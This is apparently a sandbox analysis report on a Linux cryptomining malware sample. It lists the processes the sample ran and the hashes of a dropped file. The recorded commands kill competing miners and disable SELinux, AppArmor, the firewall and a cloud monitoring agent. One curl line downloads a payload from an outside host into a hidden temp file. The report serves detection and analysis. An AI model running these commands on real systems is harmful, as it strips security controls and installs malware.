                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1818
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1826
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep :13531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1834
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1833
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep :7890
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1830
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1839
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1838
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            grep :3456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              systemctl stop c3pool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1841
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl stop skypool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl disable c3pool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl disable skypool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/killall
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      killall log_rot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        pkill -f log_rot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1858
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/sbin/setenforce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        setenforce 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Disables SELinux
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1859
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        service apparmor stop
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1861
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1862
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl --quiet is-active multi-user.target
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1863
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl list-unit-files --full "--type=socket"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl "--job-mode=ignore-dependencies" stop apparmor.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl "--job-mode=ignore-dependencies" stop apparmor.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl "--job-mode=ignore-dependencies" stop apparmor.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl "--job-mode=ignore-dependencies" stop apparmor.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl "--job-mode=ignore-dependencies" stop apparmor.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl "--job-mode=ignore-dependencies" stop apparmor.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl disable apparmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1873
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /lib/systemd/systemd-sysv-install
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      /lib/systemd/systemd-sysv-install disable apparmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1877
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/getopt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          getopt -o r: --long root: -- disable apparmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/sbin/update-rc.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            /usr/sbin/update-rc.d apparmor defaults
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/sbin/update-rc.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              /usr/sbin/update-rc.d apparmor disable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Flushes firewall rules
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          service aliyun.service stop
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1893
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1894
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl --quiet is-active multi-user.target
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl list-unit-files --full "--type=socket"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl disable aliyun.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  curl https://w1ndows.fun:8443/docker.tar.gz -o /var/tmp/.docker.tar.gz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1909

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /tmp/log_rot

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  727479ef7cedf30c03459bec7d87b0f0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2082e7f715f058acab2398d25d135cf5f4c0ce41

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba